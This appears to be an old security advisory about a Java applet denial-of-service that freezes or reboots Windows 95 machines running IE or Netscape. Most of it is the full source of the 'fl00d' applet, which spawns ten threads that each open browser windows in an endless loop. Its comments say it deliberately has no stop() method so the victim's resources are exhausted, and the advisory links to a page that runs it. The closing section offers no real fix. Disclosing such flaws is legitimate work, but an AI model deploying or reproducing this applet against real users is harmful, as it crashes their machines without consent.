COMMAND

    Java

SYSTEMS AFFECTED

    IE and Netscape browsers (others too)

PROBLEM

    Joe Lindstrom has successfully  been able to reboot  several win95
    machines with a simple java applet.  All the applet does is to try
    and load new browsers with the showDocument(url, target) function.
    When  trying  this  on  IE3  it  was  only  needed  one  loop with
    showDocument to make everything freeze, with 10 threads all  doing
    the same thing my computer immediately rebooted after initializing
    the applets.  In  IE4 and Netscape you  need more threads (it  was
    tested  with  a  web  page  with  more applets running at the same
    time).   They  have  the  same  effect  though, it either hangs or
    reboots.  If you want to see if your computer is vulnerable go to:

        http://home1.swipnet.se/~w-10867/fork/fl00d.htm

    Here's the source:

    // fl00d.class - floods your machine with browsers and eventually
    // hangs it. Code written by Joe Lindstrom.
    //
    // modifications done by Kevin Venkiteswaran (to make class smaller,
    // general code improvement).  ive made it so that it runs an infinite
    // loop trying to get the new URL and there is NO stop(), so that if
    // it doesnt crash the machine, resources will be at next to 0,
    // until they close the browser

    import java.applet.Applet;
    import java.net.URL;
    import java.net.MalformedURLException;

    public class fl00d extends Applet implements Runnable {
        static URL address = null;

        public void init() {
            System.err.println("fl00d class v1.1");
        }

        public void start() {
            try {
                address = new URL("http://fl00d.fl00d.fl00d");
            } catch(MalformedURLException e) {}
            for (int i = 0; i < 10; i++) {
                new Thread(this).start();
            }
    //        while (true) {
    //            getAppletContext().showDocument(address, "_blank");
    //        }
            try {
                Thread.currentThread().sleep(20000);
            } catch (InterruptedException e) {;}

            this.start();
        }

        public void run() {
            while (true) {
                getAppletContext().showDocument(address, "_blank");
            }
        }
    }

SOLUTION

    This is  just one  of many  possible bugs  in languages like java.
    Despite them running in a 'sandbox', they can still do this.   The
    jre1.2 is suppose to  include improved security managers,  but are
    they going to be able to catch DoS loops like this?